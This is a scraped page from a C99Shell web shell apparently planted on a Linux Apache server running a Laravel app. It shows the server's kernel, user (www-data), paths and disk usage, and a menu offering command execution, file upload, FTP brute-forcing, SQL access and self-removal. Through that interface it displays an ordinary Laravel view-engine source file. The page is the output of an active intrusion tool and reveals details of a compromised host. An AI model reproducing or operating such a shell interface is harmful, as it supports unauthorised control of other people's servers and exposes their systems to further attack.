!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/vendor/laravel/framework/src/Illuminate/View/Engines/   drwxrwxr-x
Free 13.16 GB of 57.97 GB (22.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CompilerEngine.php (2.72 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\View\Engines;

use 
Illuminate\Filesystem\Filesystem;
use 
Illuminate\View\Compilers\CompilerInterface;
use 
Illuminate\View\ViewException;
use 
Throwable;

class 
CompilerEngine extends PhpEngine
{
    
/**
     * The Blade compiler instance.
     *
     * @var \Illuminate\View\Compilers\CompilerInterface
     */
    
protected $compiler;

    
/**
     * A stack of the last compiled templates.
     *
     * @var array
     */
    
protected $lastCompiled = [];

    
/**
     * Create a new compiler engine instance.
     *
     * @param  \Illuminate\View\Compilers\CompilerInterface  $compiler
     * @param  \Illuminate\Filesystem\Filesystem|null  $files
     * @return void
     */
    
public function __construct(CompilerInterface $compilerFilesystem $files null)
    {
        
parent::__construct($files ?: new Filesystem);

        
$this->compiler $compiler;
    }

    
/**
     * Get the evaluated contents of the view.
     *
     * @param  string  $path
     * @param  array  $data
     * @return string
     */
    
public function get($path, array $data = [])
    {
        
$this->lastCompiled[] = $path;

        
// If this given view has expired, which means it has simply been edited since
        // it was last compiled, we will re-compile the views so we can evaluate a
        // fresh copy of the view. We'll pass the compiler the path of the view.
        
if ($this->compiler->isExpired($path)) {
            
$this->compiler->compile($path);
        }

        
// Once we have the path to the compiled file, we will evaluate the paths with
        // typical PHP just like any other templates. We also keep a stack of views
        // which have been rendered for right exception messages to be generated.
        
$results $this->evaluatePath($this->compiler->getCompiledPath($path), $data);

        
array_pop($this->lastCompiled);

        return 
$results;
    }

    
/**
     * Handle a view exception.
     *
     * @param  \Throwable  $e
     * @param  int  $obLevel
     * @return void
     *
     * @throws \Throwable
     */
    
protected function handleViewException(Throwable $e$obLevel)
    {
        
$e = new ViewException($this->getMessage($e), 01$e->getFile(), $e->getLine(), $e);

        
parent::handleViewException($e$obLevel);
    }

    
/**
     * Get the exception message for an exception.
     *
     * @param  \Throwable  $e
     * @return string
     */
    
protected function getMessage(Throwable $e)
    {
        return 
$e->getMessage().' (View: '.realpath(last($this->lastCompiled)).')';
    }

    
/**
     * Get the compiler implementation.
     *
     * @return \Illuminate\View\Compilers\CompilerInterface
     */
    
public function getCompiler()
    {
        return 
$this->compiler;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0106 ]--